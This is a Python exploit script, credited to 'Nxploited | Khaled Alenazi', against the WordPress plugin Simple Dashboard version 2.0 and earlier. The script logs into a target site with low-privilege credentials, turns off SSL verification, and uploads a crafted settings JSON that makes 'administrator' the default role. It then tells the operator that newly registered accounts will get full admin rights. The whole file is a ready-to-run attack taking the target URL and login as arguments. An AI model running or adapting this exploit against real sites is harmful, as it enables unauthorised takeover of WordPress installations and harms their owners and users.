import requests
import argparse

# by: Nxploited | Khaled Alenazi
requests.packages.urllib3.disable_warnings() # Disable SSL warnings

# Setup argparse
parser = argparse.ArgumentParser(description="Exploit for Simple Dashboard <= 2.0 - Privilege Escalation # By Khaled Alenazi")
parser.add_argument('-u', '--url', required=True, help='Target WordPress base URL (e.g., http://target.com/wordpress)')
parser.add_argument('-U', '--username', required=True, help='WordPress username to log in')
parser.add_argument('-P', '--password', required=True, help='Password for the WordPress user')
args = parser.parse_args()

# Setup session and headers
session = requests.Session()
session.verify = False  # Disable SSL verification
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
headers = {"User-Agent": user_agent}

# Log in to WordPress
login_url = args.url + '/wp-login.php'
login_data = {
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log In'
}
print("[*] Attempting to log in...")

response = session.post(login_url, headers=headers, data=login_data)

# Check login success
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("[+] Logged in successfully as '{}'.".format(args.username))
else:
    print("[-] Failed to log in. Please check your credentials.")
    exit()

# Exploit: Upload JSON with default_role set to administrator
exploit_url = args.url + '/wp-admin/admin.php?page=dashboard_extended_settings'
malicious_json = '{"default_role":"administrator"}'

files = {
    'settings': ('malicious.json', malicious_json, 'application/json'),
    'Upload_Settings': (None, 'Upload Settings File')
}

print("[*] Sending malicious settings file to escalate privileges...")

response = session.post(exploit_url, headers=headers, files=files)

if "Settings Saved" in response.text:
    print("[+] Exploitation successful!")
    print("[!] You can now register a new account at: {}/wp-login.php?action=register".format(args.url))
    print("[!] The new user will automatically receive Administrator privileges.")
else:
    print("[-] Exploit failed. The settings may not have been applied.")
    print("[-] Status Code:", response.status_code)